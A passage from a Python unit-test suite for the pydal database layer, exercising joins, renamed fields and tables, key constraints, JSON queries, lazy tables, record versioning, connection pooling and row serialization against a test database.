db(db.t1.id == db.t2.b).select(orderby=db.t1.aa | db.t2.aa)[2].t2.aa, "6"
)
self.assertEqual(
len(
db().select(
db.t1.ALL,
db.t2.ALL,
left=db.t2.on(db.t1.id == db.t2.b),
orderby=db.t1.aa | db.t2.aa,
)
),
4,
)
self.assertEqual(
db()
.select(
db.t1.ALL,
db.t2.ALL,
left=db.t2.on(db.t1.id == db.t2.b),
orderby=db.t1.aa | db.t2.aa,
)[2]
.t1.aa,
"2",
)
self.assertEqual(
db()
.select(
db.t1.ALL,
db.t2.ALL,
left=db.t2.on(db.t1.id == db.t2.b),
orderby=db.t1.aa | db.t2.aa,
)[2]
.t2.aa,
"6",
)
self.assertEqual(
db()
.select(
db.t1.ALL,
db.t2.ALL,
left=db.t2.on(db.t1.id == db.t2.b),
orderby=db.t1.aa | db.t2.aa,
)[3]
.t1.aa,
"3",
)
self.assertEqual(
db()
.select(
db.t1.ALL,
db.t2.ALL,
left=db.t2.on(db.t1.id == db.t2.b),
orderby=db.t1.aa | db.t2.aa,
)[3]
.t2.aa,
None,
)
self.assertEqual(
len(
db().select(
db.t1.aa,
db.t2.id.count(),
left=db.t2.on(db.t1.id == db.t2.b),
orderby=db.t1.aa,
groupby=db.t1.aa,
)
),
3,
)
self.assertEqual(
db()
.select(
db.t1.aa,
db.t2.id.count(),
left=db.t2.on(db.t1.id == db.t2.b),
orderby=db.t1.aa,
groupby=db.t1.aa,
)[0]
._extra[db.t2.id.count()],
1,
)
self.assertEqual(
db()
.select(
db.t1.aa,
db.t2.id.count(),
left=db.t2.on(db.t1.id == db.t2.b),
orderby=db.t1.aa,
groupby=db.t1.aa,
)[1]
._extra[db.t2.id.count()],
2,
)
self.assertEqual(
db()
.select(
db.t1.aa,
db.t2.id.count(),
left=db.t2.on(db.t1.id == db.t2.b),
orderby=db.t1.aa,
groupby=db.t1.aa,
)[2]
._extra[db.t2.id.count()],
0,
)
db.t2.drop()
db.t1.drop()
db.define_table("person", Field("name"), rname=rname)
id = db.person.insert(name="max")
self.assertEqual(id.name, "max")
db.define_table(
"dog", Field("name"), Field("ownerperson", "reference person"), rname=rname2
)
db.dog.insert(name="skipper", ownerperson=1)
row = db(db.person.id == db.dog.ownerperson).select().first()
self.assertEqual(row[db.person.name], "max")
self.assertEqual(row["person.name"], "max")
db.dog.drop()
self.assertEqual(len(db.person._referenced_by), 0)
class TestRNameFields(DALtest):
# tests for highly experimental rname attribute
def testSelect(self):
db = self.connect()
rname = "a_very_complicated_fieldname"
rname2 = "rrating_from_1_to_10"
db.define_table(
"easy_name",
Field("a_field", rname=rname),
Field("rating", "integer", rname=rname2, default=2),
)
rtn = db.easy_name.insert(a_field="a")
self.assertEqual(rtn.id, 1)
rtn = db(db.easy_name.a_field == "a").select()
self.assertEqual(len(rtn), 1)
self.assertEqual(rtn[0].id, 1)
self.assertEqual(rtn[0].a_field, "a")
db.easy_name.insert(a_field="b")
rtn = db(db.easy_name.id > 0).delete()
self.assertEqual(rtn, 2)
rtn = db(db.easy_name.id > 0).count()
self.assertEqual(rtn, 0)
db.easy_name.insert(a_field="a")
db.easy_name.insert(a_field="b")
rtn = db(db.easy_name.id > 0).count()
self.assertEqual(rtn, 2)
rtn = db(db.easy_name.a_field == "a").update(a_field="c")
rtn = db(db.easy_name.a_field == "c").count()
self.assertEqual(rtn, 1)
rtn = db(db.easy_name.a_field != "c").count()
self.assertEqual(rtn, 1)
avg = db.easy_name.id.avg()
rtn = db(db.easy_name.id > 0).select(avg)
self.assertEqual(rtn[0][avg], 3)
avg = db.easy_name.rating.avg()
rtn = db(db.easy_name.id > 0).select(avg)
self.assertEqual(rtn[0][avg], 2)
rname = "this_is_the_person_name"
db.define_table(
"person",
Field("id", type="id", rname="fooid"),
Field("name", default="Michael", rname=rname),
Field("uuid"),
)
rname = "this_is_the_pet_name"
db.define_table(
"pet", Field("friend", "reference person"), Field("name", rname=rname)
)
michael = db.person.insert() # default insert
john = db.person.insert(name="John")
luke = db.person.insert(name="Luke")
# michael owns Phippo
phippo = db.pet.insert(friend=michael, name="Phippo")
# john owns Dunstin and Gertie
dunstin = db.pet.insert(friend=john, name="Dunstin")
gertie = db.pet.insert(friend=john, name="Gertie")
rtn = db(db.person.id == db.pet.friend).select(orderby=db.person.id | db.pet.id)
self.assertEqual(len(rtn), 3)
self.assertEqual(rtn[0].person.id, michael)
self.assertEqual(rtn[0].person.name, "Michael")
self.assertEqual(rtn[0].pet.id, phippo)
self.assertEqual(rtn[0].pet.name, "Phippo")
self.assertEqual(rtn[1].person.id, john)
self.assertEqual(rtn[1].person.name, "John")
self.assertEqual(rtn[1].pet.name, "Dunstin")
self.assertEqual(rtn[2].pet.name, "Gertie")
# fetch owners, possibly with their pets
# main point is retrieving Luke with no pets
rtn = db(db.person.id > 0).select(
orderby=db.person.id | db.pet.id,
left=db.pet.on(db.person.id == db.pet.friend),
)
self.assertEqual(rtn[0].person.id, michael)
self.assertEqual(rtn[0].person.name, "Michael")
self.assertEqual(rtn[0].pet.id, phippo)
self.assertEqual(rtn[0].pet.name, "Phippo")
self.assertEqual(rtn[3].person.name, "Luke")
self.assertEqual(rtn[3].person.id, luke)
self.assertEqual(rtn[3].pet.name, None)
# let's test a subquery
subq = db(db.pet.name == "Gertie")._select(db.pet.friend)
rtn = db(db.person.id.belongs(subq)).select()
self.assertEqual(rtn[0].id, 2)
self.assertEqual(rtn[0]("person.name"), "John")
# as dict
rtn = db(db.person.id > 0).select().as_dict()
self.assertEqual(rtn[1]["name"], "Michael")
# as list
rtn = db(db.person.id > 0).select().as_list()
self.assertEqual(rtn[0]["name"], "Michael")
# isempty
rtn = db(db.person.id > 0).isempty()
self.assertEqual(rtn, False)
# join argument
rtn = db(db.person).select(
orderby=db.person.id | db.pet.id,
join=db.pet.on(db.person.id == db.pet.friend),
)
self.assertEqual(len(rtn), 3)
self.assertEqual(rtn[0].person.id, michael)
self.assertEqual(rtn[0].person.name, "Michael")
self.assertEqual(rtn[0].pet.id, phippo)
self.assertEqual(rtn[0].pet.name, "Phippo")
self.assertEqual(rtn[1].person.id, john)
self.assertEqual(rtn[1].person.name, "John")
self.assertEqual(rtn[1].pet.name, "Dunstin")
self.assertEqual(rtn[2].pet.name, "Gertie")
# aliases
rname = "the_cub_name"
if DEFAULT_URI.startswith("mssql"):
# multiple cascade gotcha
for key in ["reference", "reference FK"]:
db._adapter.types[key] = db._adapter.types[key].replace(
"%(on_delete_action)s", "NO ACTION"
)
db.define_table(
"pet_farm",
Field("name", rname=rname),
Field("father", "reference pet_farm"),
Field("mother", "reference pet_farm"),
)
minali = db.pet_farm.insert(name="Minali")
osbert = db.pet_farm.insert(name="Osbert")
# they had a cub
selina = db.pet_farm.insert(name="Selina", father=osbert, mother=minali)
father = db.pet_farm.with_alias("father")
mother = db.pet_farm.with_alias("mother")
# fetch pets with relatives
rtn = db().select(
db.pet_farm.name,
father.name,
mother.name,
left=[
father.on(father.id == db.pet_farm.father),
mother.on(mother.id == db.pet_farm.mother),
],
orderby=db.pet_farm.id,
)
self.assertEqual(len(rtn), 3)
self.assertEqual(rtn[0].pet_farm.name, "Minali")
self.assertEqual(rtn[0].father.name, None)
self.assertEqual(rtn[0].mother.name, None)
self.assertEqual(rtn[1].pet_farm.name, "Osbert")
self.assertEqual(rtn[2].pet_farm.name, "Selina")
self.assertEqual(rtn[2].father.name, "Osbert")
self.assertEqual(rtn[2].mother.name, "Minali")
def testRun(self):
db = self.connect()
rname = "a_very_complicated_fieldname"
for ft in ["string", "text", "password", "upload", "blob"]:
db.define_table("tt", Field("aa", ft, default="", rname=rname))
self.assertEqual(db.tt.insert(aa="x"), 1)
if not IS_ORACLE:
self.assertEqual(db().select(db.tt.aa)[0].aa, "x")
db.tt.drop()
db.define_table("tt", Field("aa", "integer", default=1, rname=rname))
self.assertEqual(db.tt.insert(aa=3), 1)
self.assertEqual(db().select(db.tt.aa)[0].aa, 3)
db.tt.drop()
db.define_table("tt", Field("aa", "double", default=1, rname=rname))
self.assertEqual(db.tt.insert(aa=3.1), 1)
self.assertEqual(db().select(db.tt.aa)[0].aa, 3.1)
db.tt.drop()
db.define_table("tt", Field("aa", "boolean", default=True, rname=rname))
self.assertEqual(db.tt.insert(aa=True), 1)
self.assertEqual(db().select(db.tt.aa)[0].aa, True)
db.tt.drop()
if not IS_ORACLE:
db.define_table("tt", Field("aa", "json", default={}, rname=rname))
self.assertEqual(db.tt.insert(aa={}), 1)
self.assertEqual(db().select(db.tt.aa)[0].aa, {})
db.tt.drop()
db.define_table(
"tt", Field("aa", "date", default=datetime.date.today(), rname=rname)
)
t0 = datetime.date.today()
self.assertEqual(db.tt.insert(aa=t0), 1)
self.assertEqual(db().select(db.tt.aa)[0].aa, t0)
db.tt.drop()
db.define_table(
"tt",
Field("aa", "datetime", default=datetime.datetime.today(), rname=rname),
)
t0 = datetime.datetime(
1971,
12,
21,
10,
30,
55,
0,
)
self.assertEqual(db.tt.insert(aa=t0), 1)
self.assertEqual(db().select(db.tt.aa)[0].aa, t0)
## Row APIs
row = db().select(db.tt.aa)[0]
self.assertEqual(db.tt[1].aa, t0)
self.assertEqual(db.tt["aa"], db.tt.aa)
self.assertEqual(db.tt(1).aa, t0)
self.assertTrue(db.tt(1, aa=None) == None)
self.assertFalse(db.tt(1, aa=t0) == None)
self.assertEqual(row.aa, t0)
self.assertEqual(row["aa"], t0)
self.assertEqual(row["tt.aa"], t0)
self.assertEqual(row("tt.aa"), t0)
self.assertTrue("aa" in row)
self.assertTrue("pydal" not in row)
self.assertTrue(hasattr(row, "aa"))
self.assertFalse(hasattr(row, "pydal"))
## Lazy and Virtual fields
db.tt.b = Field.Virtual(lambda row: row.tt.aa)
db.tt.c = Field.Lazy(lambda row: row.tt.aa)
row = db().select(db.tt.aa)[0]
self.assertEqual(row.b, t0)
self.assertEqual(row.c(), t0)
db.tt.drop()
db.define_table("tt", Field("aa", "time", default="11:30", rname=rname))
t0 = datetime.time(10, 30, 55)
self.assertEqual(db.tt.insert(aa=t0), 1)
self.assertEqual(db().select(db.tt.aa)[0].aa, t0)
def testInsert(self):
db = self.connect()
rname = "a_very_complicated_fieldname"
db.define_table("tt", Field("aa", rname=rname))
self.assertEqual(db.tt.insert(aa="1"), 1)
self.assertEqual(db.tt.insert(aa="1"), 2)
self.assertEqual(db.tt.insert(aa="1"), 3)
self.assertEqual(db(db.tt.aa == "1").count(), 3)
self.assertEqual(db(db.tt.aa == "2").isempty(), True)
self.assertEqual(db(db.tt.aa == "1").update(aa="2"), 3)
self.assertEqual(db(db.tt.aa == "2").count(), 3)
self.assertEqual(db(db.tt.aa == "2").isempty(), False)
self.assertEqual(db(db.tt.aa == "2").delete(), 3)
self.assertEqual(db(db.tt.aa == "2").isempty(), True)
def testJoin(self):
db = self.connect()
rname = "this_is_field_aa"
rname2 = "this_is_field_b"
db.define_table("t1", Field("aa", rname=rname))
db.define_table("t2", Field("aa", rname=rname), Field("b", db.t1, rname=rname2))
i1 = db.t1.insert(aa="1")
i2 = db.t1.insert(aa="2")
i3 = db.t1.insert(aa="3")
db.t2.insert(aa="4", b=i1)
db.t2.insert(aa="5", b=i2)
db.t2.insert(aa="6", b=i2)
self.assertEqual(
len(db(db.t1.id == db.t2.b).select(orderby=db.t1.aa | db.t2.aa)), 3
)
self.assertEqual(
db(db.t1.id == db.t2.b).select(orderby=db.t1.aa | db.t2.aa)[2].t1.aa, "2"
)
self.assertEqual(
db(db.t1.id == db.t2.b).select(orderby=db.t1.aa | db.t2.aa)[2].t2.aa, "6"
)
self.assertEqual(
len(
db().select(
db.t1.ALL,
db.t2.ALL,
left=db.t2.on(db.t1.id == db.t2.b),
orderby=db.t1.aa | db.t2.aa,
)
),
4,
)
self.assertEqual(
db()
.select(
db.t1.ALL,
db.t2.ALL,
left=db.t2.on(db.t1.id == db.t2.b),
orderby=db.t1.aa | db.t2.aa,
)[2]
.t1.aa,
"2",
)
self.assertEqual(
db()
.select(
db.t1.ALL,
db.t2.ALL,
left=db.t2.on(db.t1.id == db.t2.b),
orderby=db.t1.aa | db.t2.aa,
)[2]
.t2.aa,
"6",
)
self.assertEqual(
db()
.select(
db.t1.ALL,
db.t2.ALL,
left=db.t2.on(db.t1.id == db.t2.b),
orderby=db.t1.aa | db.t2.aa,
)[3]
.t1.aa,
"3",
)
self.assertEqual(
db()
.select(
db.t1.ALL,
db.t2.ALL,
left=db.t2.on(db.t1.id == db.t2.b),
orderby=db.t1.aa | db.t2.aa,
)[3]
.t2.aa,
None,
)
self.assertEqual(
len(
db().select(
db.t1.aa,
db.t2.id.count(),
left=db.t2.on(db.t1.id == db.t2.b),
orderby=db.t1.aa,
groupby=db.t1.aa,
)
),
3,
)
self.assertEqual(
db()
.select(
db.t1.aa,
db.t2.id.count(),
left=db.t2.on(db.t1.id == db.t2.b),
orderby=db.t1.aa,
groupby=db.t1.aa,
)[0]
._extra[db.t2.id.count()],
1,
)
self.assertEqual(
db()
.select(
db.t1.aa,
db.t2.id.count(),
left=db.t2.on(db.t1.id == db.t2.b),
orderby=db.t1.aa,
groupby=db.t1.aa,
)[1]
._extra[db.t2.id.count()],
2,
)
self.assertEqual(
db()
.select(
db.t1.aa,
db.t2.id.count(),
left=db.t2.on(db.t1.id == db.t2.b),
orderby=db.t1.aa,
groupby=db.t1.aa,
)[2]
._extra[db.t2.id.count()],
0,
)
db.t2.drop()
db.t1.drop()
db.define_table("person", Field("name", rname=rname))
id = db.person.insert(name="max")
self.assertEqual(id.name, "max")
db.define_table(
"dog",
Field("name", rname=rname),
Field("ownerperson", "reference person", rname=rname2),
)
db.dog.insert(name="skipper", ownerperson=1)
row = db(db.person.id == db.dog.ownerperson).select().first()
self.assertEqual(row[db.person.name], "max")
self.assertEqual(row["person.name"], "max")
db.dog.drop()
self.assertEqual(len(db.person._referenced_by), 0)
def testTFK(self):
db = self.connect()
if "reference TFK" not in db._adapter.types:
self.skipTest("Adapter does not support TFK references")
db.define_table(
"t1",
Field("id1", type="string", length=1, rname="foo1"),
Field("id2", type="integer", rname="foo2"),
Field("val", type="integer"),
primarykey=["id1", "id2"],
)
db.define_table(
"t2",
Field("ref1", type=db.t1.id1, rname="bar1"),
Field("ref2", type=db.t1.id2, rname="bar2"),
)
db.t1.insert(id1="a", id2=1, val=10)
db.t1.insert(id1="a", id2=2, val=30)
db.t2.insert(ref1="a", ref2=1)
query = (db.t1.id1 == db.t2.ref1) & (db.t1.id2 == db.t2.ref2)
result = db(query).select(db.t1.ALL)
self.assertEqual(len(result), 1)
self.assertEqual(result[0]["id1"], "a")
self.assertEqual(result[0]["id2"], 1)
self.assertEqual(result[0]["val"], 10)
class TestQuoting(DALtest):
# tests for case sensitivity
def testCase(self):
db = self.connect(ignore_field_case=False, entity_quoting=True)
if DEFAULT_URI.startswith("mssql"):
# multiple cascade gotcha
for key in ["reference", "reference FK"]:
db._adapter.types[key] = db._adapter.types[key].replace(
"%(on_delete_action)s", "NO ACTION"
)
t0 = db.define_table("t0", Field("f", "string"))
t1 = db.define_table("b", Field("B", t0), Field("words", "text"))
blather = "blah blah and so"
t0[None] = {"f": "content"}
t1[None] = {"B": int(t0[1]["id"]), "words": blather}
r = db(db.t0.id == db.b.B).select()
self.assertEqual(r[0].b.words, blather)
t1.drop()
t0.drop()
# test field case
try:
t0 = db.define_table("table_is_a_test", Field("a_a"), Field("a_A"))
except Exception as e:
# some DBs do not support case-sensitive field names; MySQL is one of them.
if DEFAULT_URI.startswith("mysql:") or DEFAULT_URI.startswith("sqlite:"):
db.rollback()
return
if "Column names in each table must be unique" in e.args[1]:
db.rollback()
return
raise e
t0[None] = dict(a_a="a_a", a_A="a_A")
self.assertEqual(t0[1].a_a, "a_a")
self.assertEqual(t0[1].a_A, "a_A")
def testPKFK(self):
# test primary keys
db = self.connect(ignore_field_case=False)
if DEFAULT_URI.startswith("mssql"):
# multiple cascade gotcha
for key in ["reference", "reference FK"]:
db._adapter.types[key] = db._adapter.types[key].replace(
"%(on_delete_action)s", "NO ACTION"
)
# test table without surrogate key. Length is limited to
# 100 because of MySQL limitations: it cannot handle more than
# 767 bytes in unique keys.
t0 = db.define_table("t0", Field("Code", length=100), primarykey=["Code"])
t2 = db.define_table("t2", Field("f"), Field("t0_Code", "reference t0"))
t3 = db.define_table(
"t3", Field("f", length=100), Field("t0_Code", t0.Code), primarykey=["f"]
)
t4 = db.define_table(
"t4", Field("f", length=100), Field("t0", t0), primarykey=["f"]
)
try:
t5 = db.define_table(
"t5",
Field("f", length=100),
Field("t0", "reference no_table_wrong_reference"),
primarykey=["f"],
)
except Exception as e:
self.assertTrue(isinstance(e, KeyError))
if DEFAULT_URI.startswith("mssql"):
# there's no drop cascade in mssql
t3.drop()
t4.drop()
t2.drop()
t0.drop()
else:
t0.drop("cascade")
t2.drop()
t3.drop()
t4.drop()
def testPKFK2(self):
# test reference to reference
db = self.connect(ignore_field_case=False)
if DEFAULT_URI.startswith("mssql"):
# multiple cascade gotcha
for key in ["reference", "reference FK"]:
db._adapter.types[key] = db._adapter.types[key].replace(
"%(on_delete_action)s", "NO ACTION"
)
t0 = db.define_table("object_", Field("id", "id"))
t1 = db.define_table(
"part", Field("id", "reference object_"), primarykey=["id"]
)
t2 = db.define_table(
"part_rev",
Field("id", "reference object_"),
Field("part", "reference part"),
Field("rev", "integer"),
primarykey=["id"],
)
id = db.object_.insert()
db.part.insert(id=id)
id_rev = db.object_.insert()
db.part_rev.insert(id=id_rev, part=id, rev=0)
result = db(db.part_rev.part == db.part.id).select()
self.assertEqual(len(result), 1)
self.assertEqual(result[0]["part_rev.id"], id_rev)
self.assertEqual(result[0]["part_rev.part"], id)
if DEFAULT_URI.startswith(("mssql", "sqlite")):
# there's no drop cascade in mssql and it seems there is some problem in sqlite
t2.drop()
t1.drop()
t0.drop()
else:
t0.drop("cascade")
t1.drop("cascade")
t2.drop()
class TestTableAndFieldCase(unittest.TestCase):
"""
At the Python level we should not allow both db.C and db.c, because of .table file conflicts on Windows,
but it should be possible to map two different Python-level names into distinct backend tables "c" and "C".
By default, Python model names should be mapped to lower-case table names, assuming case insensitivity.
(An illustrative rname-based sketch follows this class.)
"""
def testme(self):
return
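# Illustrative sketch (hypothetical, not part of the original suite): one way to
# obtain two distinct backend tables "c" and "C" while keeping distinct Python-level
# names would be an explicit rname mapping, assuming the adapter quotes entity
# names so that the two are not collapsed:
#   db.define_table("c_lower", Field("f"), rname="c")
#   db.define_table("c_upper", Field("f"), rname="C")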
class TestQuotesByDefault(unittest.TestCase):
"""
All default table names should be quoted unless an explicit mapping has been given for a table
(see the illustrative sketch after this class).
"""
def testme(self):
return
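# Illustrative sketch (hypothetical, not part of the original suite): with entity
# quoting enabled the default table name is emitted quoted, while an explicit
# rname mapping makes the adapter use that name instead:
#   db = DAL(DEFAULT_URI, entity_quoting=True)
#   db.define_table("person", Field("name"))                          # quoted as "person"
#   db.define_table("employee", Field("name"), rname="employee_tbl")  # emitted as "employee_tbl"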
class TestGis(DALtest):
@unittest.skipIf(True, "WIP")
def testGeometry(self):
from pydal import geoPoint, geoLine, geoPolygon
if not IS_POSTGRESQL:
return
db = self.connect()
t0 = db.define_table("t0", Field("point", "geometry()"))
t1 = db.define_table("t1", Field("line", "geometry(public, 4326, 2)"))
t2 = db.define_table("t2", Field("polygon", "geometry(public, 4326, 2)"))
t0.insert(point=geoPoint(1, 1))
text = (
db(db.t0.id)
.select(db.t0.point.st_astext())
.first()[db.t0.point.st_astext()]
)
self.assertEqual(text, "POINT(1 1)")
t1.insert(line=geoLine((1, 1), (2, 2)))
text = (
db(db.t1.id).select(db.t1.line.st_astext()).first()[db.t1.line.st_astext()]
)
self.assertEqual(text, "LINESTRING(1 1,2 2)")
t2.insert(polygon=geoPolygon((0, 0), (2, 0), (2, 2), (0, 2), (0, 0)))
text = (
db(db.t2.id)
.select(db.t2.polygon.st_astext())
.first()[db.t2.polygon.st_astext()]
)
self.assertEqual(text, "POLYGON((0 0,2 0,2 2,0 2,0 0))")
query = t0.point.st_intersects(geoLine((0, 0), (2, 2)))
output = db(query).select(db.t0.point).first()[db.t0.point]
self.assertEqual(output, "POINT(1 1)")
query = t2.polygon.st_contains(geoPoint(1, 1))
n = db(query).count()
self.assertEqual(n, 1)
x = t0.point.st_x()
y = t0.point.st_y()
point = db(t0.id).select(x, y).first()
self.assertEqual(point[x], 1)
self.assertEqual(point[y], 1)
@unittest.skipIf(True, "WIP")
def testGeometryCase(self):
from pydal import geoPoint, geoLine, geoPolygon
if not IS_POSTGRESQL:
return
db = self.connect(ignore_field_case=False)
t0 = db.define_table(
"t0", Field("point", "geometry()"), Field("Point", "geometry()")
)
t0.insert(point=geoPoint(1, 1))
t0.insert(Point=geoPoint(2, 2))
@unittest.skipIf(True, "WIP")
def testGisMigration(self):
if not IS_POSTGRESQL:
return
for b in [True, False]:
db = DAL(DEFAULT_URI, check_reserved=["all"], ignore_field_case=b)
t0 = db.define_table(
"t0",
Field("Point", "geometry()"),
Field("rname_point", "geometry()", rname="foo"),
)
db.commit()
db.close()
db = DAL(DEFAULT_URI, check_reserved=["all"], ignore_field_case=b)
t0 = db.define_table("t0", Field("New_point", "geometry()"))
t0.drop()
db.commit()
db.close()
@unittest.skipUnless(IS_POSTGRESQL, "Only implemented for postgres for now")
class TestJSON(DALtest):
def testJSONExpressions(self):
db = self.connect()
if not hasattr(db._adapter.dialect, "json_key"):
return
tj = db.define_table("tj", Field("testjson", "json"))
rec1 = tj.insert(
testjson={
u"a": {u"a1": 2, u"a0": 1},
u"b": 3,
u"c": {u"c0": {u"c01": [2, 4]}},
u"str": "foo",
}
)
rec2 = tj.insert(
testjson={
u"a": {u"a1": 2, u"a0": 2},
u"b": 4,
u"c": {u"c0": {u"c01": [2, 3]}},
u"str": "bar",
}
)
rows = db(db.tj.testjson.json_key("a").json_key_value("a0") == 1).select()
self.assertEqual(len(rows), 1)
self.assertEqual(rows[0].id, rec1)
rows = db(db.tj.testjson.json_path_value("{a, a1}") == 2).select()
self.assertEqual(len(rows), 2)
rows = db(db.tj.testjson.json_path_value("{a, a0}") == 2).select()
self.assertEqual(len(rows), 1)
self.assertEqual(rows[0].id, rec2)
rows = db(db.tj.testjson.json_path_value(r"{str}") == "foo").select()
self.assertEqual(len(rows), 1)
rows = db(db.tj.testjson.json_contains('{"c": {"c0":{"c01": [2]}}}')).select()
self.assertEqual(len(rows), 2)
rows = db(db.tj.testjson.json_contains('{"c": {"c0":{"c01": [4]}}}')).select()
self.assertEqual(len(rows), 1)
rows = db(db.tj.id > 0).select(
db.tj.testjson.json_path("{c, c0, c01, 0}").with_alias("first")
)
self.assertEqual(rows[0].first, 2)
self.assertEqual(rows[1].first, 2)
class TestSQLCustomType(DALtest):
def testRun(self):
db = self.connect()
from pydal.helpers.classes import SQLCustomType
native_double = "double"
native_string = "string"
if hasattr(db._adapter, "types"):
native_double = db._adapter.types["double"]
native_string = db._adapter.types["string"] % {"length": 256}
basic_t = SQLCustomType(type="double", native=native_double)
basic_t_str = SQLCustomType(type="string", native=native_string)
t0 = db.define_table(
"t0", Field("price", basic_t), Field("product", basic_t_str)
)
r_id = t0.insert(price=None, product=None)
row = db(t0.id == r_id).select(t0.ALL).first()
self.assertEqual(row["price"], None)
self.assertEqual(row["product"], None)
r_id = t0.insert(price=1.2, product="car")
row = db(t0.id == r_id).select(t0.ALL).first()
self.assertEqual(row["price"], 1.2)
self.assertEqual(row["product"], "car")
t0.drop()
import zlib
native = "text"
if IS_ORACLE:
native = "CLOB"
compressed = SQLCustomType(
type="text",
native=native,
encoder=(lambda x: zlib.compress(x or "", 1)),
decoder=(lambda x: zlib.decompress(x)),
)
t1 = db.define_table("t0", Field("cdata", compressed))
# r_id=t1.insert(cdata="car")
# row=db(t1.id == r_id).select(t1.ALL).first()
# self.assertEqual(row['cdata'], "'car'")
class TestLazy(DALtest):
def testRun(self):
db = self.connect(lazy_tables=True)
t0 = db.define_table("t0", Field("name"))
self.assertTrue(("t0" in db._LAZY_TABLES.keys()))
db.t0.insert(name="1")
self.assertFalse(("t0" in db._LAZY_TABLES.keys()))
def testLazyGetter(self):
db = self.connect(check_reserved=None, lazy_tables=True)
db.define_table("tt", Field("value", "integer"))
db.define_table(
"ttt",
Field("value", "integer"),
Field("tt_id", "reference tt"),
)
# Force table definition
db.ttt.value.writable = False
idd = db.tt.insert(value=0)
db.ttt.insert(tt_id=idd)
def testRowNone(self):
db = self.connect(check_reserved=None, lazy_tables=True)
tt = db.define_table("tt", Field("value", "integer"))
db.tt.insert(value=None)
row = db(db.tt).select(db.tt.ALL).first()
self.assertEqual(row.value, None)
self.assertEqual(row[db.tt.value], None)
self.assertEqual(row["tt.value"], None)
self.assertEqual(row.get("tt.value"), None)
self.assertEqual(row["value"], None)
self.assertEqual(row.get("value"), None)
def testRowExtra(self):
db = self.connect(check_reserved=None, lazy_tables=True)
if IS_ORACLE:
# lazy use is difficult in Oracle if using cased (non-upper) fields
tt = db.define_table("tt", Field("VALUE", "integer"))
db.tt.insert(VALUE=1)
else:
tt = db.define_table("tt", Field("value", "integer"))
db.tt.insert(value=1)
row = db(db.tt).select("value").first()
self.assertEqual(row.value, 1)
class TestRedefine(unittest.TestCase):
def testRun(self):
db = DAL(DEFAULT_URI, check_reserved=["all"], lazy_tables=True, migrate=False)
db.define_table("t_a", Field("code"))
self.assertTrue("code" in db.t_a)
self.assertTrue("code" in db["t_a"])
db.define_table("t_a", Field("code_a"), redefine=True)
self.assertFalse("code" in db.t_a)
self.assertFalse("code" in db["t_a"])
self.assertTrue("code_a" in db.t_a)
self.assertTrue("code_a" in db["t_a"])
db.close()
class TestUpdateInsert(DALtest):
def testRun(self):
db = self.connect()
t0 = db.define_table("t0", Field("name"))
i_id = t0.update_or_insert((t0.id == 1), name="web2py")
u_id = t0.update_or_insert((t0.id == i_id), name="web2py2")
self.assertTrue(i_id != None)
self.assertTrue(u_id == None)
self.assertTrue(db(t0).count() == 1)
self.assertTrue(db(t0.name == "web2py").count() == 0)
self.assertTrue(db(t0.name == "web2py2").count() == 1)
class TestBulkInsert(DALtest):
def testRun(self):
db = self.connect()
t0 = db.define_table("t0", Field("name"))
global ctr
ctr = 0
def test_after_insert(i, r):
self.assertIsInstance(i, OpRow)
global ctr
ctr += 1
return True
t0._after_insert.append(test_after_insert)
items = [{"name": "web2py_%s" % pos} for pos in range(0, 10, 1)]
t0.bulk_insert(items)
self.assertTrue(db(t0).count() == len(items))
for pos in range(0, 10, 1):
self.assertTrue(db(t0.name == "web2py_%s" % pos).count() == 1)
self.assertTrue(ctr == len(items))
class TestRecordVersioning(DALtest):
def testRun(self):
db = self.connect()
db.define_table(
"t0",
Field("name"),
Field("is_active", writable=False, readable=False, default=True),
)
db.t0._enable_record_versioning(archive_name="t0_archive")
self.assertTrue("t0_archive" in db)
i_id = db.t0.insert(name="web2py1")
db.t0.insert(name="web2py2")
db(db.t0.name == "web2py2").delete()
self.assertEqual(len(db(db.t0).select()), 1)
self.assertEqual(db(db.t0).count(), 1)
db(db.t0.id == i_id).update(name="web2py3")
self.assertEqual(len(db(db.t0).select()), 1)
self.assertEqual(db(db.t0).count(), 1)
self.assertEqual(len(db(db.t0_archive).select()), 2)
self.assertEqual(db(db.t0_archive).count(), 2)
@unittest.skipIf(IS_SQLITE or IS_NOSQL, "Skip if sqlite or NOSQL since no pools")
class TestConnection(unittest.TestCase):
def testRun(self):
# check connection is no longer active after close
db = DAL(DEFAULT_URI, check_reserved=["all"])
connection = db._adapter.connection
db.close()
if not IS_ORACLE:
# newer Oracle versions no longer play well with explicit .close()
self.assertRaises(Exception, connection.commit)
# check connections are reused with pool_size
connections = set()
for a in range(10):
db2 = DAL(DEFAULT_URI, check_reserved=["all"], pool_size=5)
c = db2._adapter.connection
connections.add(c)
db2.close()
self.assertEqual(len(connections), 1)
c = connections.pop()
c.commit()
c.close()
# check correct use of pool_size
dbs = []
for a in range(10):
db3 = DAL(DEFAULT_URI, check_reserved=["all"], pool_size=5)
# make sure the connection is established
db3._adapter.get_connection()
dbs.append(db3)
for db in dbs:
db.close()
self.assertEqual(len(db3._adapter.POOLS[DEFAULT_URI]), 5)
for c in db3._adapter.POOLS[DEFAULT_URI]:
c.close()
db3._adapter.POOLS[DEFAULT_URI] = []
# Clean close if a connection is broken (closed explicitly)
if not IS_ORACLE:
for a in range(10):
db4 = DAL(DEFAULT_URI, check_reserved=["all"], pool_size=5)
db4._adapter.connection.close()
db4.close()
self.assertEqual(len(db4._adapter.POOLS[DEFAULT_URI]), 0)
class TestSerializers(DALtest):
def testAsJson(self):
db = self.connect()
db.define_table("tt", Field("date_field", "datetime"))
db.tt.insert(date_field=datetime.datetime.now())
rows = db().select(db.tt.ALL)
j = rows.as_json()
import json # standard library
json.loads(j)
def testSelectIterselect(self):
db = self.connect()
db.define_table("tt", Field("tt"))
db.tt.insert(tt="pydal")
methods = ["as_dict", "as_csv", "as_json", "as_xml", "as_list"]
for method in methods:
rows = db(db.tt).select()
rowsI = db(db.tt).iterselect()
self.assertEqual(
getattr(rows, method)(), getattr(rowsI, method)(), "failed %s" % method
)
class TestIterselect(DALtest):
def testRun(self):
db = self.connect()
t0 = db.define_table("t0", Field("name"))
names = ["web2py", "pydal", "Massimo"]
for n in names:
t0.insert(name=n)
rows = db(db.t0).select(orderby=db.t0.id)
for pos, r in enumerate(rows):
self.assertEqual(r.name, names[pos])
# Testing basic iteration
rows = db(db.t0).iterselect(orderby=db.t0.id)
for pos, r in enumerate(rows):
self.assertEqual(r.name, names[pos])
# Testing IterRows.first before basic iteration
rows = db(db.t0).iterselect(orderby=db.t0.id)
self.assertEqual(rows.first().name, names[0])
self.assertEqual(rows.first().name, names[0])
